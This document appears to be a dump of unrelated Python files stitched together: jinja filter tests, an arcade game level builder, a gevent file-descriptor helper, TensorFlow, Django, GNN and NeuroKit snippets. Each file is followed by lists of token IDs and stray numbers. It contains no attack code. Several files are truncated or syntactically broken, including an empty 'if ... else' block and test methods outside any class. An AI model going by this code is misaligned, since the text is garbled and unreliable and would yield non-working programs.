# coding: utf-8 from types import SimpleNamespace from datetime import datetime, timedelta from unittest.mock import patch from dateutil.relativedelta import relativedelta from jinja2 import Undefined, Markup from mock import Mock from app.jinja_filters import ( format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list) from tests.app.app_context_test_case import AppContextTestCase def test_format_year_month_duration(self): with self.app_request_context('/'): self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months') self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years') self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months') self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month') self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months') def test_format_year_duration(self): with self.app_request_context('/'): self.assertEqual(format_duration({'years': 5}), '5 years') self.assertEqual(format_duration({'years': 1}), '1 year') self.assertEqual(format_duration({'years': 0}), '0 years') def test_format_month_duration(self): with self.app_request_context('/'): self.assertEqual(format_duration({'months': 5}), '5 months') self.assertEqual(format_duration({'months': 1}), '1 month') self.assertEqual(format_duration({'months': 0}), '0 months') def test_format_unordered_list(self): list_items = [['item 1', 'item 2']] formatted_value = format_unordered_list(self.autoescape_context, list_items) expected_value = '<ul><li>item 1</li><li>item 2</li></ul>' self.assertEqual(expected_value, formatted_value) def test_format_unordered_list_with_no_input(self): list_items = [] formatted_value = format_unordered_list(self.autoescape_context, list_items) self.assertEqual('', formatted_value) def test_format_unordered_list_with_empty_list(self): list_items = [[]] formatted_value = format_unordered_list(self.autoescape_context, list_items) self.assertEqual('', formatted_value) def test_max_value(self): # Given two_ints = (1, 2) # When max_of_two = max_value(*two_ints) # Then self.assertEqual(max_of_two, 2) def test_max_value_none(self): # Given one_int = (1, None) # When max_of_two = max_value(*one_int) # Then self.assertEqual(max_of_two, 1) def test_max_value_undefined(self): # Given args = ('foo', Undefined()) # When with self.assertRaises(Exception) as exception: max_value(*args) # Then self.assertIn( "Cannot determine maximum of incompatible types max(<class 'str'>," " <class 'jinja2.runtime.Undefined'>)", str(exception.exception)) def test_max_values_incompatible(self): # Given args = (1, 'abc') # When with self.assertRaises(Exception) as exception: max_value(*args) # Then self.assertIn( "Cannot determine maximum of incompatible types max(<class 'int'>," " <class 'str'>)", str(exception.exception)) def test_max_values_compatible(self): # Given args = (-1, True) # When max_of_two = max_value(*args) # Then self.assertEqual(max_of_two, True) def test_max_value_str(self): # Given two_str = ('a', 'abc') # When max_of_two = max_value(*two_str) # Then self.assertEqual(max_of_two, 'abc') def test_max_value_date(self): # Given now = datetime.utcnow() then = now - timedelta(seconds=60) two_dates = (then, now) # When max_of_two = max_value(*two_dates) # Then self.assertEqual(max_of_two, now) def test_min_value(self): # Given two_ints = (1, 2) # When min_of_two = min_value(*two_ints) # Then self.assertEqual(min_of_two, 1) def test_min_value_none(self): # Given one_int = (1, None) # When min_of_two = min_value(*one_int) # Then self.assertEqual(min_of_two, 1) def test_min_value_undefined(self): # Given args = ('foo', Undefined()) # When with self.assertRaises(Exception) as exception: min_value(*args) # Then self.assertIn( "Cannot determine minimum of incompatible types min(<class 'str'>," " <class 'jinja2.runtime.Undefined'>)", str(exception.exception)) def test_min_values_incompatible(self): # Given args = (1, 'abc') # When with self.assertRaises(Exception) as exception: min_value(*args) # Then self.assertIn( "Cannot determine minimum of incompatible types min(<class 'int'>," " <class 'str'>)", str(exception.exception)) def test_min_values_compatible(self): # Given args = (-1, True) # When min_of_two = min_value(*args) # Then self.assertEqual(min_of_two, -1) def test_min_value_str(self): # Given two_str = ('a', 'abc') # When min_of_two = min_value(*two_str) # Then self.assertEqual(min_of_two, 'a') def test_min_value_date(self): # Given now = datetime.utcnow() then = now - timedelta(seconds=60) two_dates = (then, now) # When min_of_two = min_value(*two_dates) # Then self.assertEqual(min_of_two, then) def test_get_question_title_with_title_value(self): # Given question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'title': 'question_title' } } ) # When title = get_question_title(context, question_id) # Then self.assertEqual(title, 'question_title') def test_get_question_title_with_question_titles(self): # Given question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question' }, 'content': { 'question_titles': { 'question': 'default_question_title' } } } ) # When title = get_question_title(context, question_id) # Then self.assertEqual(title, 'default_question_title') def test_get_answer_label_with_answer_label(self): # Given answer_id = 'answer' question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'answers': [{ 'id': 'answer', 'label': 'answer_label' }] } } ) # When answer_label = get_answer_label(context, answer_id, question_id) # Then self.assertEqual(answer_label, 'answer_label') def test_get_answer_label_with_no_answer_label_and_title(self): # Given answer_id = 'answer' question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'title': 'question_title', 'answers': [{ 'id': 'answer' }] } } ) # When answer_label = get_answer_label(context, answer_id, question_id) # Then self.assertEqual(answer_label, 'question_title') def test_get_answer_label_with_no_answer_label_and_question_titles(self): # Given answer_id = 'answer' question_id = 'question' context = SimpleNamespace( parent={ 'question': { 'id': 'question', 'answers': [{ 'id': 'answer' }] }, 'content': { 'question_titles': { 'question': 'default_question_title' } } } ) # When answer_label = get_answer_label(context, answer_id, question_id) # Then self.assertEqual(answer_label, 'default_question_title') def test_offset_date_from_day(self): test_cases = [ # (Input Date, offset, day of week, expected output) ('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday ('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday) ('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday ('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset ('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input ('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday ('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input ('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks ('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing ('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year ('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day ] for case in test_cases: self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 6738, 3858, 1330, 17427, 36690, 10223, 198, 198, 6738, 4818, 8079, 1330, 4818, 8079, 11, 28805, 12514, 198, 6738, 555, 715, 395, 13, 76, 735, 1330, 8529, 198, 198, 6738, 3128, 22602, 13, 2411, 26...
2.065426
5,319
import arcade import os SPRITE_SCALING = 0.5 SPRITE_NATIVE_SIZE = 128 SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING) SCREEN_WIDTH = SPRITE_SIZE * 14 SCREEN_HEIGHT = SPRITE_SIZE * 10 MOVEMENT_SPEED = 5 COIN_SCALE = 0.7 def setup_room_1(): """ Create and return room 1. If your program gets large, you may want to separate this into different files. """ room = Room() """ Set up the game and initialize the variables. """ # Sprite lists room.wall_list = arcade.SpriteList() room.door_list = arcade.SpriteList() room.coin_list = arcade.SpriteList() room.smallpotion_list = arcade.SpriteList() room.bigpotion_list = arcade.SpriteList() for y in (0, SCREEN_HEIGHT - SPRITE_SIZE): # Loop for each box going across for x in range(0, SCREEN_WIDTH, SPRITE_SIZE): wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) # Create left and right column of boxes for x in (0, SCREEN_WIDTH - SPRITE_SIZE): # Loop for each box going across for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE): # Skip making a block 4 and 5 blocks up on the right side if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0: wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) for x in (0, SCREEN_WIDTH - SPRITE_SIZE): # Loop for each box going across for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE): if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0: door = arcade.Sprite("fence.png", SPRITE_SCALING) door.left = x door.bottom = y room.door_list.append(door) wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING) wall.left = 7 * SPRITE_SIZE wall.bottom = 5 * SPRITE_SIZE room.wall_list.append(wall) # If you want coins or monsters in a level, then add that code here. # Load the background image for this level. room.background = arcade.load_texture("g.png") for i in range(300,600,75): coin = arcade.Sprite("coin.png",COIN_SCALE) coin.center_x = i coin.center_y = 500 room.coin_list.append(coin) smallpotion = arcade.Sprite("big.png",0.05) smallpotion.center_x = 100 smallpotion.center_y = 900 room.smallpotion_list.append(smallpotion) return room def setup_room_2(): """ Create and return room 2. """ room = Room() """ Set up the game and initialize the variables. """ # Sprite lists room.door_list = arcade.SpriteList() room.wall_list = arcade.SpriteList() room.coin_list = arcade.SpriteList() room.smallpotion_list = arcade.SpriteList() room.bigpotion_list = arcade.SpriteList() # -- Set up the walls # Create bottom and top row of boxes # This y loops a list of two, the coordinate 0, and just under the top of window for y in (0, SCREEN_HEIGHT - SPRITE_SIZE): # Loop for each box going across for x in range(0, SCREEN_WIDTH, SPRITE_SIZE): wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) # Create left and right column of boxes for x in (0, SCREEN_WIDTH - SPRITE_SIZE): # Loop for each box going across for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE): # Skip making a block 4 and 5 blocks up if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0: wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = x wall.bottom = y room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 1 * SPRITE_SIZE wall.bottom = 6 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 1 * SPRITE_SIZE wall.bottom = 3 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 3 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 2 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 3 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 5 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 4 * SPRITE_SIZE wall.bottom = 2.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom =3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 0.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 6 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 7 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 7 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 9 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 1.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 2.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 3.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 4.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 5.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 10 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 9 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 6.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 7.5 * SPRITE_SIZE room.wall_list.append(wall) wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING) wall.left = 8 * SPRITE_SIZE wall.bottom = 8 * SPRITE_SIZE room.wall_list.append(wall) room.background = arcade.load_texture("g.png") bigpotion = arcade.Sprite("small.png",0.05) bigpotion.center_x = 800 bigpotion.center_y = 100 room.bigpotion_list.append(bigpotion) return room def main(): """ Main method """ window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT) window.setup() arcade.run() if __name__ == "__main__": main()
[ 11748, 27210, 201, 198, 11748, 28686, 201, 198, 201, 198, 4303, 49, 12709, 62, 6173, 1847, 2751, 796, 657, 13, 20, 201, 198, 4303, 49, 12709, 62, 34259, 9306, 62, 33489, 796, 13108, 201, 198, 4303, 49, 12709, 62, 33489, 796, 493, 7,...
2.180004
4,811
# Copyright (c) 2018 gevent community # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from __future__ import absolute_import, print_function, division import os import unittest import re from . import sysinfo # Linux/OS X/BSD platforms can implement this by calling out to lsof if sysinfo.WIN: else: lsof_get_open_files = default_get_open_files try: # psutil import subprocess which on Python 3 imports selectors. # This can expose issues with monkey-patching. import psutil except ImportError: get_open_files = default_get_open_files get_number_open_files = default_get_number_open_files else: # If psutil is available (it is cross-platform) use that. # It is *much* faster than shelling out to lsof each time # (Running 14 tests takes 3.964s with lsof and 0.046 with psutil) # However, it still doesn't completely solve the issue on Windows: fds are reported # as -1 there, so we can't fully check those. def get_open_files(): """ Return a list of popenfile and pconn objects. Note that other than `fd`, they have different attributes. .. important:: If you want to find open sockets, on Windows and linux, it is important that the socket at least be listening (socket.listen(1)). Unlike the lsof implementation, this will only return sockets in a state like that. """ results = dict() process = psutil.Process() results['data'] = process.open_files() + process.connections('all') for x in results['data']: results[x.fd] = x results['data'] += ['From psutil', process] return results
[ 2, 15069, 357, 66, 8, 2864, 4903, 1151, 2055, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 198, 2, 286, 428, 3788, 290, 3917, 10314, 3696, 357, 1169, 366, 25423, 12340, 2...
3.173964
845
''' marathon_example.py performs a simple matrix multiply using 3 compute nodes ''' if __name__ == '__main__': from sys import argv import tensorflow as tf from dtforchestrator import * args = parseargs() with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices: with tf.device(tfdevices.getDeviceSpec(1)): matrix1 = tf.constant([[3.],[3.]]) with tf.device(tfdevices.getDeviceSpec(2)): matrix2 = tf.constant([[3.,3.]]) with tf.device(tfdevices.getDeviceSpec(0)): matrix0 = tf.constant([[3.,3.]]) product1 = tf.matmul(matrix0, matrix1) product2 = tf.matmul(matrix2, matrix1) with tf.Session(tfdevices.localGRPC()) as sess: res = sess.run(product1) print res res = sess.run(product2) print res
[ 7061, 6, 198, 220, 220, 22336, 62, 20688, 13, 9078, 198, 220, 220, 220, 220, 220, 17706, 257, 2829, 17593, 29162, 1262, 513, 24061, 13760, 198, 7061, 6, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 2...
2.28841
371
''' Original code contributor: mentzera Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/ ''' import boto3 import json import twitter_to_es # from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \ # twitter_to_es from tweet_utils import \ get_tweet, id_field, get_tweet_mapping headers = {"Content-Type": "application/json"} s3 = boto3.client('s3') kinesis_client = boto3.client('kinesis') # dynamoDb_client = boto3.client('dynamodb') # Lambda execution starts here
[ 7061, 6, 198, 20556, 2438, 18920, 25, 6229, 89, 8607, 198, 14906, 2792, 25, 3740, 1378, 8356, 13, 33103, 13, 785, 14, 49096, 14, 14261, 12, 7890, 14, 16894, 12, 64, 12, 40093, 12, 5305, 12, 2435, 12, 67, 40821, 12, 24254, 12, 4480...
2.73301
206
from django.contrib.messages.constants import DEFAULT_LEVELS from user_messages.api import get_messages def messages(request): """ Return a lazy 'messages' context variable as well as 'DEFAULT_MESSAGE_LEVELS'. """ return { "messages": get_messages(request=request), "DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS, }
[ 6738, 42625, 14208, 13, 3642, 822, 13, 37348, 1095, 13, 9979, 1187, 1330, 5550, 38865, 62, 2538, 18697, 50, 198, 198, 6738, 2836, 62, 37348, 1095, 13, 15042, 1330, 651, 62, 37348, 1095, 628, 198, 4299, 6218, 7, 25927, 2599, 198, 220, ...
2.451389
144
## Highest Score # Don't change the code below student_scores = input("Input a list of student scores: ").split() for n in range(0, len(student_scores)): student_scores[n] = int(student_scores[n]) print(student_scores) # Don't change the code above # Write your code below this row highest_score = 0 for scores in student_scores: if scores > highest_score: highest_score = scores print(f'The highest score is: {highest_score}') # functional code print(max(student_scores))
[ 2235, 41864, 15178, 198, 2, 220, 2094, 470, 1487, 262, 2438, 2174, 220, 198, 50139, 62, 1416, 2850, 796, 5128, 7203, 20560, 257, 1351, 286, 3710, 8198, 25, 366, 737, 35312, 3419, 198, 1640, 299, 287, 2837, 7, 15, 11, 18896, 7, 50139...
2.940828
169
import argparse from loader import MoleculeDataset from torch_geometric.data import DataLoader import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from tqdm import tqdm import numpy as np from model import GNN, GNN_graphpred from sklearn.metrics import roc_auc_score from splitters import scaffold_split, random_split import pandas as pd import os import shutil from tensorboardX import SummaryWriter criterion = nn.BCEWithLogitsLoss(reduction = "none") if __name__ == "__main__": main()
[ 11748, 1822, 29572, 198, 198, 6738, 40213, 1330, 25726, 23172, 27354, 292, 316, 198, 6738, 28034, 62, 469, 16996, 13, 7890, 1330, 6060, 17401, 198, 198, 11748, 28034, 198, 11748, 28034, 13, 20471, 355, 299, 77, 198, 11748, 28034, 13, 20...
3.107955
176
from jumpscale.core import exceptions
[ 6738, 18045, 38765, 13, 7295, 1330, 13269, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 198 ]
3.222222
18
# -*- coding: utf-8 -*- import matplotlib.pyplot as plt import numpy as np import pandas as pd from ..events import events_plot from ..stats import standardize as nk_standardize def signal_plot( signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs ): """Plot signal with events as vertical lines. Parameters ---------- signal : array or DataFrame Signal array (can be a dataframe with many signals). sampling_rate : int The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if the data should be plotted over time in seconds. Otherwise the data is plotted over samples. Defaults to None. subplots : bool If True, each signal is plotted in a subplot. standardize : bool If True, all signals will have the same scale (useful for visualisation). labels : str or list Defaults to None. **kwargs : optional Arguments passed to matplotlib plotting. Examples ---------- >>> import numpy as np >>> import pandas as pd >>> import neurokit2 as nk >>> >>> signal = nk.signal_simulate(duration=10, sampling_rate=1000) >>> nk.signal_plot(signal, sampling_rate=1000, color="red") >>> >>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)), ... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)), ... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))}) >>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True) >>> nk.signal_plot([signal, data], standardize=True) """ # Sanitize format if isinstance(signal, list): try: for i in signal: len(i) except TypeError: signal = np.array(signal) if isinstance(signal, pd.DataFrame) is False: # If list is passed if isinstance(signal, list) or len(np.array(signal).shape) > 1: out = pd.DataFrame() for i, content in enumerate(signal): if isinstance(content, (pd.DataFrame, pd.Series)): out = pd.concat([out, content], axis=1, sort=True) else: out = pd.concat( [out, pd.DataFrame({"Signal" + str(i + 1): content})], axis=1, sort=True, ) signal = out # If vector is passed else: signal = pd.DataFrame({"Signal": signal}) # Copy signal signal = signal.copy() # Guess continuous and events columns continuous_columns = list(signal.columns.values) events_columns = [] for col in signal.columns: vector = signal[col] if vector.nunique() == 2: indices = np.where(vector == np.max(vector.unique())) if bool(np.any(np.diff(indices) == 1)) is False: events_columns.append(col) continuous_columns.remove(col) # Adjust for sampling rate if sampling_rate is not None: signal.index = signal.index / sampling_rate title_x = "Time (seconds)" else: title_x = "Time" # x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0]) # x_axis = pd.DataFrame(x_axis, columns=["Time (s)"]) # signal = pd.concat([signal, x_axis], axis=1) # signal = signal.set_index("Time (s)") # Plot accordingly if len(events_columns) > 0: events = [] for col in events_columns: vector = signal[col] events.append(np.where(vector == np.max(vector.unique()))[0]) plot = events_plot(events, signal=signal[continuous_columns]) if sampling_rate is None and signal.index.is_integer(): plot.gca().set_xlabel("Samples") else: plot.gca().set_xlabel(title_x) else: # Aesthetics colors = [ "#1f77b4", "#ff7f0e", "#2ca02c", "#d62728", "#9467bd", "#8c564b", "#e377c2", "#7f7f7f", "#bcbd22", "#17becf", ] if len(continuous_columns) > len(colors): colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns))) # Plot if standardize is True: signal[continuous_columns] = nk_standardize(signal[continuous_columns]) if subplots is True: _, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs) for ax, col, color in zip(axes, continuous_columns, colors): ax.plot(signal[col], c=color, **kwargs) else: plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs) if sampling_rate is None and signal.index.is_integer(): plt.xlabel("Samples") else: plt.xlabel(title_x) # Tidy legend locations and add labels if labels is None: labels = continuous_columns.copy() if isinstance(labels, str): n_labels = len([labels]) labels = [labels] elif isinstance(labels, list): n_labels = len(labels) if len(signal[continuous_columns].columns) != n_labels: raise ValueError( "NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals." ) if subplots is False: plt.legend(labels, loc=1) else: for i, label in enumerate(labels): axes[i].legend([label], loc=1)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 6738, 11485, 31534, 1330, 29...
2.118499
2,692